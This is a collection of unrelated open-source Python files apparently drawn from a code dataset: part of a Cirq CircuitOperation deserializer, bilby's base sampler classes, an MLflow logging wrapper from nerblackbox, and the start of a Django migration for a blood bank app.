        proto: v2.program_pb2.CircuitOperation,
        *,
        arg_function_language: str = '',
        constants: Optional[List[v2.program_pb2.Constant]] = None,
        deserialized_constants: Optional[List[Any]] = None,
    ) -> cirq.CircuitOperation:
        """Turns a cirq.google.api.v2.CircuitOperation proto into a CircuitOperation.
        Args:
            proto: The proto object to be deserialized.
            arg_function_language: The `arg_function_language` field from
                `Program.Language`.
            constants: The list of Constant protos referenced by constant
                table indices in `proto`. This list should already have been
                parsed to produce 'deserialized_constants'.
            deserialized_constants: The deserialized contents of `constants`.
        Returns:
            The deserialized CircuitOperation represented by `proto`.
        """
        if constants is None or deserialized_constants is None:
            raise ValueError(
                'CircuitOp deserialization requires a constants list and a corresponding list of '
                'post-deserialization values (deserialized_constants).'
            )
        if len(deserialized_constants) <= proto.circuit_constant_index:
            raise ValueError(
                f'Constant index {proto.circuit_constant_index} in CircuitOperation '
                'does not appear in the deserialized_constants list '
                f'(length {len(deserialized_constants)}).'
            )
        # The subcircuit itself lives in the constant table, not inline in the proto.
        circuit = deserialized_constants[proto.circuit_constant_index]
        if not isinstance(circuit, cirq.FrozenCircuit):
            raise ValueError(
                f'Constant at index {proto.circuit_constant_index} was expected to be a circuit, '
                f'but it has type {type(circuit)} in the deserialized_constants list.'
            )
        # Repetitions are given either as a bare count or as explicit ids
        # (one id per repetition); absent both, default to a single repetition.
        which_rep_spec = proto.repetition_specification.WhichOneof('repetition_value')
        if which_rep_spec == 'repetition_count':
            rep_ids = None
            repetitions = proto.repetition_specification.repetition_count
        elif which_rep_spec == 'repetition_ids':
            rep_ids = proto.repetition_specification.repetition_ids.ids
            repetitions = len(rep_ids)
        else:
            rep_ids = None
            repetitions = 1
        qubit_map = {
            v2.qubit_from_proto_id(entry.key.id): v2.qubit_from_proto_id(entry.value.id)
            for entry in proto.qubit_map.entries
        }
        measurement_key_map = {
            entry.key.string_key: entry.value.string_key
            for entry in proto.measurement_key_map.entries
        }
        arg_map = {
            arg_func_langs.arg_from_proto(
                entry.key, arg_function_language=arg_function_language
            ): arg_func_langs.arg_from_proto(
                entry.value, arg_function_language=arg_function_language
            )
            for entry in proto.arg_map.entries
        }
        # Validate that the deserialized arg map only maps parameter names/symbols
        # to symbols or plain numbers before handing it to CircuitOperation.
        for arg in arg_map.keys():
            if not isinstance(arg, (str, sympy.Symbol)):
                raise ValueError(
                    'Invalid key parameter type in deserialized CircuitOperation. '
                    f'Expected str or sympy.Symbol, found {type(arg)}.'
                    f'\nFull arg: {arg}'
                )
        for arg in arg_map.values():
            if not isinstance(arg, (str, sympy.Symbol, float, int)):
                raise ValueError(
                    'Invalid value parameter type in deserialized CircuitOperation. '
                    f'Expected str, sympy.Symbol, or number; found {type(arg)}.'
                    f'\nFull arg: {arg}'
                )
        return cirq.CircuitOperation(
            circuit,
            repetitions,
            qubit_map,
            measurement_key_map,
            arg_map,  # type: ignore
            rep_ids,
        )
    # pylint: enable=missing-raises-doc
| 38.501529 | 98 | 0.625894 |
5e25a7e54247fa0dcc7f5e9841e308bbfd071173 | 24,768 | py | Python | bilby/core/sampler/base_sampler.py | LBJ-Wade/bilby | b1e02f1dfae03d4939cae9c95eff300c22919689 | [
"MIT"
] | 31 | 2019-02-28T00:48:23.000Z | 2022-03-29T09:41:28.000Z | bilby/core/sampler/base_sampler.py | LBJ-Wade/bilby | b1e02f1dfae03d4939cae9c95eff300c22919689 | [
"MIT"
] | 8 | 2018-12-27T09:15:03.000Z | 2022-03-28T19:02:10.000Z | bilby/core/sampler/base_sampler.py | LBJ-Wade/bilby | b1e02f1dfae03d4939cae9c95eff300c22919689 | [
"MIT"
] | 32 | 2018-11-30T00:58:53.000Z | 2022-03-29T09:41:30.000Z | import datetime
import distutils.dir_util
import numpy as np
import os
import tempfile
from pandas import DataFrame
from ..utils import logger, check_directory_exists_and_if_not_mkdir, command_line_args, Counter
from ..prior import Prior, PriorDict, DeltaFunction, Constraint
from ..result import Result, read_in_result
class Sampler(object):
    """ A sampler object to aid in setting up an inference run
    Parameters
    ==========
    likelihood: likelihood.Likelihood
        A object with a log_l method
    priors: bilby.core.prior.PriorDict, dict
        Priors to be used in the search.
        This has attributes for each parameter to be sampled.
    external_sampler: str, Sampler, optional
        A string containing the module name of the sampler or an instance of
        this class
    outdir: str, optional
        Name of the output directory
    label: str, optional
        Naming scheme of the output files
    use_ratio: bool, optional
        Switch to set whether or not you want to use the log-likelihood ratio
        or just the log-likelihood
    plot: bool, optional
        Switch to set whether or not you want to create traceplots
    injection_parameters:
        A dictionary of the injection parameters
    meta_data:
        A dictionary of extra meta data to store in the result
    result_class: bilby.core.result.Result, or child of
        The result class to use. By default, `bilby.core.result.Result` is used,
        but objects which inherit from this class can be given providing
        additional methods.
    soft_init: bool, optional
        Switch to enable a soft initialization that prevents the likelihood
        from being tested before running the sampler. This is relevant when
        using custom likelihoods that must NOT be initialized on the main thread
        when using multiprocessing, e.g. when using tensorflow in the likelihood.
    **kwargs: dict
        Additional keyword arguments
    Attributes
    ==========
    likelihood: likelihood.Likelihood
        A object with a log_l method
    priors: bilby.core.prior.PriorDict
        Priors to be used in the search.
        This has attributes for each parameter to be sampled.
    external_sampler: Module
        An external module containing an implementation of a sampler.
    outdir: str
        Name of the output directory
    label: str
        Naming scheme of the output files
    use_ratio: bool
        Switch to set whether or not you want to use the log-likelihood ratio
        or just the log-likelihood
    plot: bool
        Switch to set whether or not you want to create traceplots
    skip_import_verification: bool
        Skips the check if the sampler is installed if true. This is
        only advisable for testing environments
    result: bilby.core.result.Result
        Container for the results of the sampling run
    exit_code: int
        System exit code to return on interrupt
    kwargs: dict
        Dictionary of keyword arguments that can be used in the external sampler
    Raises
    ======
    TypeError:
        If external_sampler is neither a string nor an instance of this class
        If not all likelihood.parameters have been defined
    ImportError:
        If the external_sampler string does not refer to a sampler that is
        installed on this system
    AttributeError:
        If some of the priors can't be sampled
    """
    # Subclasses override this with the full set of kwargs accepted by the
    # wrapped external sampler; unknown user kwargs are pruned against it.
    default_kwargs = dict()
    # Alternative user-facing spellings of the "number of parallel processes"
    # kwarg, normalised by subclasses in _translate_kwargs.
    npool_equiv_kwargs = ['queue_size', 'threads', 'nthreads', 'npool']
    def __init__(
            self, likelihood, priors, outdir='outdir', label='label',
            use_ratio=False, plot=False, skip_import_verification=False,
            injection_parameters=None, meta_data=None, result_class=None,
            likelihood_benchmark=False, soft_init=False, exit_code=130,
            **kwargs):
        self.likelihood = likelihood
        # Accept a plain dict of priors and normalise it to a PriorDict.
        if isinstance(priors, PriorDict):
            self.priors = priors
        else:
            self.priors = PriorDict(priors)
        self.label = label
        self.outdir = outdir
        self.injection_parameters = injection_parameters
        self.meta_data = meta_data
        self.use_ratio = use_ratio
        # Import the external sampler module up front so a missing install
        # fails early rather than mid-run.
        if not skip_import_verification:
            self._verify_external_sampler()
        self.external_sampler_function = None
        self.plot = plot
        self.likelihood_benchmark = likelihood_benchmark
        self._search_parameter_keys = list()
        self._fixed_parameter_keys = list()
        self._constraint_parameter_keys = list()
        self._initialise_parameters()
        self.exit_code = exit_code
        # soft_init skips any likelihood evaluation on the main thread
        # (see class docstring).
        if not soft_init:
            self._verify_parameters()
            self._time_likelihood()
            self._verify_use_ratio()
        self.kwargs = kwargs
        self._check_cached_result()
        self._log_summary_for_sampler()
        self.result = self._initialise_result(result_class)
        self.likelihood_count = None
        if self.likelihood_benchmark:
            self.likelihood_count = Counter()
    @property
    def search_parameter_keys(self):
        """list: List of parameter keys that are being sampled"""
        return self._search_parameter_keys
    @property
    def fixed_parameter_keys(self):
        """list: List of parameter keys that are not being sampled"""
        return self._fixed_parameter_keys
    @property
    def constraint_parameter_keys(self):
        """list: List of parameters providing prior constraints"""
        return self._constraint_parameter_keys
    @property
    def ndim(self):
        """int: Number of dimensions of the search parameter space"""
        return len(self._search_parameter_keys)
    @property
    def kwargs(self):
        """dict: Container for the kwargs. Has more sophisticated logic in subclasses """
        return self._kwargs
    @kwargs.setter
    def kwargs(self, kwargs):
        # Start from sampler defaults, translate user aliases in-place, then
        # overlay the user kwargs and prune anything the sampler won't accept.
        self._kwargs = self.default_kwargs.copy()
        self._translate_kwargs(kwargs)
        self._kwargs.update(kwargs)
        self._verify_kwargs_against_default_kwargs()
    def _translate_kwargs(self, kwargs):
        """ Template for child classes """
        pass
    @property
    def external_sampler_name(self):
        # Module name of the wrapped sampler; by convention the lowercase
        # class name of the subclass.
        return self.__class__.__name__.lower()
    def _verify_external_sampler(self):
        external_sampler_name = self.external_sampler_name
        try:
            # Dynamic import by module name; keeps the wrapped sampler an
            # optional dependency.
            self.external_sampler = __import__(external_sampler_name)
        except (ImportError, SystemExit):
            raise SamplerNotInstalledError(
                "Sampler {} is not installed on this system".format(external_sampler_name))
    def _verify_kwargs_against_default_kwargs(self):
        """
        Check if the kwargs are contained in the list of available arguments
        of the external sampler.
        """
        args = self.default_kwargs
        bad_keys = []
        for user_input in self.kwargs.keys():
            if user_input not in args:
                logger.warning(
                    "Supplied argument '{}' not an argument of '{}', removing."
                    .format(user_input, self.__class__.__name__))
                bad_keys.append(user_input)
        # Removed outside the loop to avoid mutating the dict while iterating.
        for key in bad_keys:
            self.kwargs.pop(key)
    def _initialise_parameters(self):
        """
        Go through the list of priors and add keys to the fixed and search
        parameter key list depending on whether
        the respective parameter is fixed.
        """
        for key in self.priors:
            if isinstance(self.priors[key], Prior) \
                    and self.priors[key].is_fixed is False:
                self._search_parameter_keys.append(key)
            elif isinstance(self.priors[key], Constraint):
                self._constraint_parameter_keys.append(key)
            elif isinstance(self.priors[key], DeltaFunction):
                # Fixed (delta-function) parameters are set on the likelihood
                # once here and never sampled.
                self.likelihood.parameters[key] = self.priors[key].sample()
                self._fixed_parameter_keys.append(key)
        logger.info("Search parameters:")
        for key in self._search_parameter_keys + self._constraint_parameter_keys:
            logger.info('  {} = {}'.format(key, self.priors[key]))
        for key in self._fixed_parameter_keys:
            logger.info('  {} = {}'.format(key, self.priors[key].peak))
    def _initialise_result(self, result_class):
        """
        Returns
        =======
        bilby.core.result.Result: An initial template for the result
        """
        result_kwargs = dict(
            label=self.label, outdir=self.outdir,
            sampler=self.__class__.__name__.lower(),
            search_parameter_keys=self._search_parameter_keys,
            fixed_parameter_keys=self._fixed_parameter_keys,
            constraint_parameter_keys=self._constraint_parameter_keys,
            priors=self.priors, meta_data=self.meta_data,
            injection_parameters=self.injection_parameters,
            sampler_kwargs=self.kwargs, use_ratio=self.use_ratio)
        if result_class is None:
            result = Result(**result_kwargs)
        elif issubclass(result_class, Result):
            result = result_class(**result_kwargs)
        else:
            raise ValueError(
                "Input result_class={} not understood".format(result_class))
        return result
    def _verify_parameters(self):
        """ Evaluate a set of parameters drawn from the prior
        Tests if the likelihood evaluation passes
        Raises
        ======
        TypeError
            Likelihood can't be evaluated.
        """
        if self.priors.test_has_redundant_keys():
            raise IllegalSamplingSetError(
                "Your sampling set contains redundant parameters.")
        theta = self.priors.sample_subset_constrained_as_array(
            self.search_parameter_keys, size=1)[:, 0]
        try:
            self.log_likelihood(theta)
        except TypeError as e:
            raise TypeError(
                "Likelihood evaluation failed with message: \n'{}'\n"
                "Have you specified all the parameters:\n{}"
                .format(e, self.likelihood.parameters))
    def _time_likelihood(self, n_evaluations=100):
        """ Times the likelihood evaluation and print an info message
        Parameters
        ==========
        n_evaluations: int
            The number of evaluations to estimate the evaluation time from
        """
        t1 = datetime.datetime.now()
        for _ in range(n_evaluations):
            theta = self.priors.sample_subset_constrained_as_array(
                self._search_parameter_keys, size=1)[:, 0]
            self.log_likelihood(theta)
        total_time = (datetime.datetime.now() - t1).total_seconds()
        self._log_likelihood_eval_time = total_time / n_evaluations
        # A measured time of exactly zero means the clock resolution was too
        # coarse; store NaN rather than a misleading 0.
        if self._log_likelihood_eval_time == 0:
            self._log_likelihood_eval_time = np.nan
            logger.info("Unable to measure single likelihood time")
        else:
            logger.info("Single likelihood evaluation took {:.3e} s"
                        .format(self._log_likelihood_eval_time))
    def _verify_use_ratio(self):
        """
        Checks if use_ratio is set. Prints a warning if use_ratio is set but
        not properly implemented.
        """
        try:
            self.priors.sample_subset(self.search_parameter_keys)
        except (KeyError, AttributeError):
            logger.error("Cannot sample from priors with keys: {}.".format(
                self.search_parameter_keys
            ))
            raise
        if self.use_ratio is False:
            logger.debug("use_ratio set to False")
            return
        ratio_is_nan = np.isnan(self.likelihood.log_likelihood_ratio())
        if self.use_ratio is True and ratio_is_nan:
            logger.warning(
                "You have requested to use the loglikelihood_ratio, but it "
                " returns a NaN")
        elif self.use_ratio is None and not ratio_is_nan:
            # use_ratio=None means "auto": enable it if the ratio is available.
            logger.debug(
                "use_ratio not spec. but gives valid answer, setting True")
            self.use_ratio = True
    def prior_transform(self, theta):
        """ Prior transform method that is passed into the external sampler.
        Parameters
        ==========
        theta: list
            List of sampled values on a unit interval
        Returns
        =======
        list: Properly rescaled sampled values
        """
        return self.priors.rescale(self._search_parameter_keys, theta)
    def log_prior(self, theta):
        """
        Parameters
        ==========
        theta: list
            List of sampled values on a unit interval
        Returns
        =======
        float: Joint ln prior probability of theta
        """
        params = {
            key: t for key, t in zip(self._search_parameter_keys, theta)}
        return self.priors.ln_prob(params)
    def log_likelihood(self, theta):
        """
        Parameters
        ==========
        theta: list
            List of values for the likelihood parameters
        Returns
        =======
        float: Log-likelihood or log-likelihood-ratio given the current
            likelihood.parameter values
        """
        if self.likelihood_benchmark:
            try:
                self.likelihood_count.increment()
            except AttributeError:
                pass
        params = {
            key: t for key, t in zip(self._search_parameter_keys, theta)}
        self.likelihood.parameters.update(params)
        if self.use_ratio:
            return self.likelihood.log_likelihood_ratio()
        else:
            return self.likelihood.log_likelihood()
    def get_random_draw_from_prior(self):
        """ Get a random draw from the prior distribution
        Returns
        =======
        draw: array_like
            An ndim-length array of values drawn from the prior. Parameters
            with delta-function (or fixed) priors are not returned
        """
        new_sample = self.priors.sample()
        draw = np.array(list(new_sample[key]
                             for key in self._search_parameter_keys))
        self.check_draw(draw)
        return draw
    def get_initial_points_from_prior(self, npoints=1):
        """ Method to draw a set of live points from the prior
        This iterates over draws from the prior until all the samples have a
        finite prior and likelihood (relevant for constrained priors).
        Parameters
        ==========
        npoints: int
            The number of values to return
        Returns
        =======
        unit_cube, parameters, likelihood: tuple of array_like
            unit_cube (nlive, ndim) is an array of the prior samples from the
            unit cube, parameters (nlive, ndim) is the unit_cube array
            transformed to the target space, while likelihood (nlive) are the
            likelihood evaluations.
        """
        logger.info("Generating initial points from the prior")
        unit_cube = []
        parameters = []
        likelihood = []
        while len(unit_cube) < npoints:
            unit = np.random.rand(self.ndim)
            theta = self.prior_transform(unit)
            # Rejection-sample: keep only draws with finite prior & likelihood.
            if self.check_draw(theta, warning=False):
                unit_cube.append(unit)
                parameters.append(theta)
                likelihood.append(self.log_likelihood(theta))
        return np.array(unit_cube), np.array(parameters), np.array(likelihood)
    def check_draw(self, theta, warning=True):
        """
        Checks if the draw will generate an infinite prior or likelihood
        Also catches the output of `numpy.nan_to_num`.
        Parameters
        ==========
        theta: array_like
            Parameter values at which to evaluate likelihood
        warning: bool
            Whether or not to print a warning
        Returns
        =======
        bool
            True if the likelihood and prior are finite, false otherwise
        """
        log_p = self.log_prior(theta)
        log_l = self.log_likelihood(theta)
        return \
            self._check_bad_value(val=log_p, warning=warning, theta=theta, label='prior') and \
            self._check_bad_value(val=log_l, warning=warning, theta=theta, label='likelihood')
    @staticmethod
    def _check_bad_value(val, warning, theta, label):
        val = np.abs(val)
        # np.nan_to_num(np.inf) is the largest finite float, used elsewhere as
        # an inf sentinel (see NestedSampler.log_likelihood), so treat it as bad.
        bad_values = [np.inf, np.nan_to_num(np.inf)]
        if val in bad_values or np.isnan(val):
            if warning:
                logger.warning(f'Prior draw {theta} has inf {label}')
            return False
        return True
    def run_sampler(self):
        """A template method to run in subclasses"""
        pass
    def _run_test(self):
        """
        TODO: Implement this method
        Raises
        =======
        ValueError: in any case
        """
        raise ValueError("Method not yet implemented")
    def _check_cached_result(self):
        """ Check if the cached data file exists and can be used """
        if command_line_args.clean:
            logger.debug("Command line argument clean given, forcing rerun")
            self.cached_result = None
            return
        try:
            self.cached_result = read_in_result(
                outdir=self.outdir, label=self.label)
        except IOError:
            self.cached_result = None
        if command_line_args.use_cached:
            # --use-cached trusts the cache unconditionally; skip validation.
            logger.debug(
                "Command line argument cached given, no cache check performed")
            return
        logger.debug("Checking cached data")
        if self.cached_result:
            # The cache is only valid if the run configuration matches.
            check_keys = ['search_parameter_keys', 'fixed_parameter_keys',
                          'kwargs']
            use_cache = True
            for key in check_keys:
                if self.cached_result._check_attribute_match_to_other_object(
                        key, self) is False:
                    logger.debug("Cached value {} is unmatched".format(key))
                    use_cache = False
            if use_cache is False:
                self.cached_result = None
    def _log_summary_for_sampler(self):
        """Print a summary of the sampler used and its kwargs"""
        if self.cached_result is None:
            kwargs_print = self.kwargs.copy()
            for k in kwargs_print:
                # Abbreviate bulky values (large arrays / DataFrames) so the
                # log line stays readable.
                if type(kwargs_print[k]) in (list, np.ndarray):
                    array_repr = np.array(kwargs_print[k])
                    if array_repr.size > 10:
                        kwargs_print[k] = ('array_like, shape={}'
                                           .format(array_repr.shape))
                elif type(kwargs_print[k]) == DataFrame:
                    kwargs_print[k] = ('DataFrame, shape={}'
                                       .format(kwargs_print[k].shape))
            logger.info("Using sampler {} with kwargs {}".format(
                self.__class__.__name__, kwargs_print))
    def calc_likelihood_count(self):
        # Copy the benchmark counter into the result; no-op (returns None)
        # when benchmarking is disabled.
        if self.likelihood_benchmark:
            self.result.num_likelihood_evaluations = self.likelihood_count.value
        else:
            return None
class NestedSampler(Sampler):
    """Base class for samplers based on nested sampling."""

    # Alternative user-facing spellings of the live-point and walk kwargs,
    # normalised by subclasses in _translate_kwargs.
    npoints_equiv_kwargs = ['nlive', 'nlives', 'n_live_points', 'npoints',
                            'npoint', 'Nlive', 'num_live_points', 'num_particles']
    walks_equiv_kwargs = ['walks', 'steps', 'nmcmc']

    def reorder_loglikelihoods(self, unsorted_loglikelihoods, unsorted_samples,
                               sorted_samples):
        """ Reorders the stored log-likelihood after they have been reweighted

        This creates a sorting index by matching the reweighted `result.samples`
        against the raw samples, then uses this index to sort the
        loglikelihoods

        Parameters
        ==========
        sorted_samples, unsorted_samples: array-like
            Sorted and unsorted values of the samples. These should be of the
            same shape and contain the same sample values, but in different
            orders
        unsorted_loglikelihoods: array-like
            The loglikelihoods corresponding to the unsorted_samples

        Returns
        =======
        sorted_loglikelihoods: array-like
            The loglikelihoods reordered to match that of the sorted_samples
        """
        idxs = []
        for ii in range(len(unsorted_loglikelihoods)):
            # Find the row(s) of unsorted_samples equal to the ii-th sorted sample.
            idx = np.where(np.all(sorted_samples[ii] == unsorted_samples,
                                  axis=1))[0]
            if len(idx) > 1:
                logger.warning(
                    "Multiple likelihood matches found between sorted and "
                    "unsorted samples. Taking the first match.")
            idxs.append(idx[0])
        return unsorted_loglikelihoods[idxs]

    def log_likelihood(self, theta):
        """
        Since some nested samplers don't call the log_prior method, evaluate
        the prior constraint here.

        Parameters
        ==========
        theta: array_like
            Parameter values at which to evaluate likelihood

        Returns
        =======
        float: log_likelihood
        """
        if self.priors.evaluate_constraints({
                key: theta[ii] for ii, key in
                enumerate(self.search_parameter_keys)}):
            return Sampler.log_likelihood(self, theta)
        else:
            # Largest-finite-float sentinel for -inf (recognised by
            # Sampler._check_bad_value).
            return np.nan_to_num(-np.inf)

    def _setup_run_directory(self):
        """
        If using a temporary directory, the output directory is moved to the
        temporary directory.

        Used for Dnest4, Pymultinest, and Ultranest.
        """
        if self.use_temporary_directory:
            # Use mkdtemp() rather than TemporaryDirectory().name: the latter
            # creates a directory whose finalizer deletes it again as soon as
            # the unreferenced TemporaryDirectory object is garbage collected,
            # which could wipe the run directory mid-run. mkdtemp creates a
            # persistent directory with no finalizer attached.
            temporary_outputfiles_basename = tempfile.mkdtemp()
            self.temporary_outputfiles_basename = temporary_outputfiles_basename
            if os.path.exists(self.outputfiles_basename):
                distutils.dir_util.copy_tree(self.outputfiles_basename, self.temporary_outputfiles_basename)
            check_directory_exists_and_if_not_mkdir(temporary_outputfiles_basename)
            self.kwargs["outputfiles_basename"] = self.temporary_outputfiles_basename
            logger.info("Using temporary file {}".format(temporary_outputfiles_basename))
        else:
            check_directory_exists_and_if_not_mkdir(self.outputfiles_basename)
            self.kwargs["outputfiles_basename"] = self.outputfiles_basename
            logger.info("Using output file {}".format(self.outputfiles_basename))
class MCMCSampler(Sampler):
    """Base class for samplers based on Markov-chain Monte Carlo."""
    # Alternative user-facing spellings of the walker and burn-in kwargs,
    # normalised by subclasses in _translate_kwargs.
    nwalkers_equiv_kwargs = ['nwalker', 'nwalkers', 'draws', 'Niter']
    nburn_equiv_kwargs = ['burn', 'nburn']
    def print_nburn_logging_info(self):
        """ Prints logging info as to how nburn was calculated """
        if type(self.nburn) in [float, int]:
            logger.info("Discarding {} steps for burn-in".format(self.nburn))
        elif self.result.max_autocorrelation_time is None:
            logger.info("Autocorrelation time not calculated, discarding {} "
                        " steps for burn-in".format(self.nburn))
        else:
            logger.info("Discarding {} steps for burn-in, estimated from "
                        "autocorr".format(self.nburn))
    def calculate_autocorrelation(self, samples, c=3):
        """ Uses the `emcee.autocorr` module to estimate the autocorrelation
        Stores the result in `self.result.max_autocorrelation_time`
        (None if the estimate fails).
        Parameters
        ==========
        samples: array_like
            A chain of samples.
        c: float
            The minimum number of autocorrelation times needed to trust the
            estimate (default: `3`). See `emcee.autocorr.integrated_time`.
        """
        # Imported locally so emcee remains an optional dependency.
        import emcee
        try:
            self.result.max_autocorrelation_time = int(np.max(
                emcee.autocorr.integrated_time(samples, c=c)))
            logger.info("Max autocorr time = {}".format(
                self.result.max_autocorrelation_time))
        except emcee.autocorr.AutocorrError as e:
            self.result.max_autocorrelation_time = None
            logger.info("Unable to calculate autocorr time: {}".format(e))
# Exception hierarchy: `Error` is the module root; samplers raise the
# more specific subclasses below.
class Error(Exception):
    """ Base class for all exceptions raised by this module """
class SamplerError(Error):
    """ Base class for Error related to samplers in this module """
class ResumeError(Error):
    """ Class for errors arising from resuming runs """
class SamplerNotInstalledError(SamplerError):
    """ Base class for Error raised by not installed samplers """
class IllegalSamplingSetError(Error):
    """ Class for illegal sets of sampling parameters """
class SamplingMarginalisedParameterError(IllegalSamplingSetError):
    """ Class for errors that occur when sampling over marginalized parameters """
| 36.157664 | 108 | 0.621003 |
9b57ce6683bdfe9ba6a321d0adc3afd6618447ab | 4,639 | py | Python | nerblackbox/modules/ner_training/logging/mlflow_client.py | af-ai-center/nerblackbox | a2b751d0b74c3f4779ccf3846e35d8575b488027 | [
"Apache-2.0"
] | 11 | 2020-09-24T12:10:52.000Z | 2021-05-28T12:59:06.000Z | nerblackbox/modules/ner_training/logging/mlflow_client.py | af-ai-center/nerblackbox | a2b751d0b74c3f4779ccf3846e35d8575b488027 | [
"Apache-2.0"
] | 1 | 2020-07-03T13:13:35.000Z | 2020-07-03T13:13:35.000Z | nerblackbox/modules/ner_training/logging/mlflow_client.py | af-ai-center/nerblackbox | a2b751d0b74c3f4779ccf3846e35d8575b488027 | [
"Apache-2.0"
] | null | null | null | import mlflow
from nerblackbox.modules.experiment_config.experiment_config import ExperimentConfig
class MLflowClient:
    """Thin convenience wrapper around mlflow (hyper)parameter, metric and
    artifact logging for a single training run."""

    def __init__(
        self, experiment_name, run_name, log_dirs, logged_metrics, default_logger
    ):
        """
        Args:
            experiment_name: [str], e.g. 'Default'
            run_name: [str], e.g. 'Default'
            log_dirs: [Namespace] with the artifact file paths used below
            logged_metrics: [list] of [str], e.g. ['all_precision_micro', ..]
            default_logger: logger used for debug messages
        """
        self.experiment_name = experiment_name
        self.run_name = run_name
        self.log_dirs = log_dirs
        self.default_logger = default_logger
        self.logged_metrics = logged_metrics  # TODO: not used !!

    @staticmethod
    def log_params(params, hparams, experiment=False):
        """Log (hyper)parameters to mlflow.

        Args:
            params: [argparse.Namespace] attr: experiment_name, run_name, pretrained_model_name, ..
            hparams: [argparse.Namespace] attr: batch_size, max_seq_length, max_epochs, lr_*
            experiment: [bool] whether run is part of an experiment w/ multiple runs
        """
        if experiment:
            # run belongs to an experiment -> log only this run's (hyper)parameters
            experiment_config = ExperimentConfig(
                experiment_name=params.experiment_name,
                run_name=params.run_name,
                device=params.device,
                fp16=params.fp16,
            )
            params_and_hparams = experiment_config.get_params_and_hparams(
                run_name_nr=params.run_name_nr
            )
            for name, value in params_and_hparams.items():
                mlflow.log_param(name, value)
            return

        # standalone run -> log a hardcoded set of (hyper)parameters
        if params is not None:
            mlflow.log_param("parameters", vars(params))
        if hparams is not None:
            hparams_dict = vars(hparams)
            mlflow.log_param("hyperparameters", hparams_dict)
            # additionally expose the most important hyperparameters individually
            for hyperparameter in (
                "prune_ratio_train",
                "prune_ratio_val",
                "prune_ratio_test",
                "max_epochs",
                "lr_max",
                "lr_schedule",
            ):
                mlflow.log_param(hyperparameter, hparams_dict[hyperparameter])

    def log_metric(self, _metric, _stopped_epoch):
        """Log a single metric value to mlflow."""
        mlflow.log_metric(_metric, _stopped_epoch)

    def log_metrics(self, _epoch, _epoch_val_metrics):
        """Log all validation metrics of one epoch to mlflow.

        Args:
            _epoch: [int]
            _epoch_val_metrics: [dict] metric name -> value
        """
        for name, value in _epoch_val_metrics.items():
            # mlflow metric names may not contain brackets
            sanitized = name.replace("[", "_").replace("]", "_")
            mlflow.log_metric(sanitized, value)

    def log_artifact(self, _artifact: str, overwrite=False):
        """Append text to the artifact file (e.g. confusion matrix, report).

        Args:
            _artifact: [str] text to log
            overwrite: [bool] if True, clear the existing artifact first
        """
        if overwrite:
            self._clear_artifact()
        self._log_artifact(_artifact)

    @staticmethod
    def log_time(_time):
        """Log the elapsed run time to mlflow."""
        mlflow.log_metric("time", _time)

    def _clear_artifact(self):
        """Reset the mlflow artifact file."""
        with open(self.log_dirs.mlflow_file, "w") as artifact_file:
            artifact_file.write(" ")

    def _log_artifact(self, content):
        """Append one line of content to the mlflow artifact file."""
        with open(self.log_dirs.mlflow_file, "a") as artifact_file:
            artifact_file.write(content + "\n")

    def finish_artifact_mlflow(self):
        """Register the accumulated mlflow artifact file with mlflow."""
        mlflow.log_artifact(self.log_dirs.mlflow_file)
        self.default_logger.log_debug(f"mlflow file at {self.log_dirs.mlflow_file}")

    def finish_artifact_logger(self):
        """Register the default logger's log file with mlflow."""
        mlflow.log_artifact(self.log_dirs.log_file)
        self.default_logger.log_debug(f"log file at {self.log_dirs.log_file}")
| 37.41129 | 120 | 0.560466 |
be421484f04c1a5a93a1b896742b58c3d06a1745 | 7,143 | py | Python | blood_bank/migrations/0001_initial.py | Matheus-IT/blood_bank_backend | 63984132509d624ffab988d77c9382bc7a6fb493 | [
"MIT"
] | null | null | null | blood_bank/migrations/0001_initial.py | Matheus-IT/blood_bank_backend | 63984132509d624ffab988d77c9382bc7a6fb493 | [
"MIT"
] | null | null | null | blood_bank/migrations/0001_initial.py | Matheus-IT/blood_bank_backend | 63984132509d624ffab988d77c9382bc7a6fb493 | [
"MIT"
] | 1 | 2022-03-11T10:32:16.000Z | 2022-03-11T10:32:16.000Z | # Generated by Django 4.0.3 on 2022-03-24 20:46
import cpf_field.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial auto-generated schema migration for the blood_bank app.

    NOTE(review): generated by Django (see header comment); do not hand-edit
    field definitions here — schema changes belong in a follow-up migration.
    """
    initial = True
    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
    ]
    operations = [
        migrations.CreateModel(
            name='Address',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('city', models.CharField(max_length=50)),
                ('state', models.CharField(max_length=50)),
                ('street', models.CharField(max_length=50)),
                ('neighborhood', models.CharField(max_length=50)),
                ('number', models.IntegerField(null=True)),
                ('reference_point', models.CharField(max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='CollectionBags',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('num_bag', models.SlugField(default='123', max_length=100, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='Donation',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateField(auto_now_add=True)),
                ('local', models.CharField(max_length=100)),
                ('real_weight', models.FloatField()),
                ('temperature', models.FloatField()),
                ('entry_time', models.DateTimeField()),
                # NOTE(review): exit_time is a DateField while entry_time is a
                # DateTimeField — confirm this asymmetry is intended.
                ('exit_time', models.DateField()),
            ],
        ),
        migrations.CreateModel(
            name='Tubes',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('num_tube', models.SlugField(max_length=100, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='Nurse',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('telephone1', models.CharField(max_length=11)),
                ('telephone2', models.CharField(max_length=11, null=True)),
                ('address', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.address')),
            ],
        ),
        migrations.CreateModel(
            name='Exams',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('description', models.CharField(max_length=200)),
                ('state_exam', models.CharField(choices=[('y', 'exam valid'), ('n', 'exam not valid'), ('w', 'waiting exam result')], max_length=3)),
                ('donation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blood_bank.donation')),
            ],
        ),
        migrations.CreateModel(
            name='Donator',
            fields=[
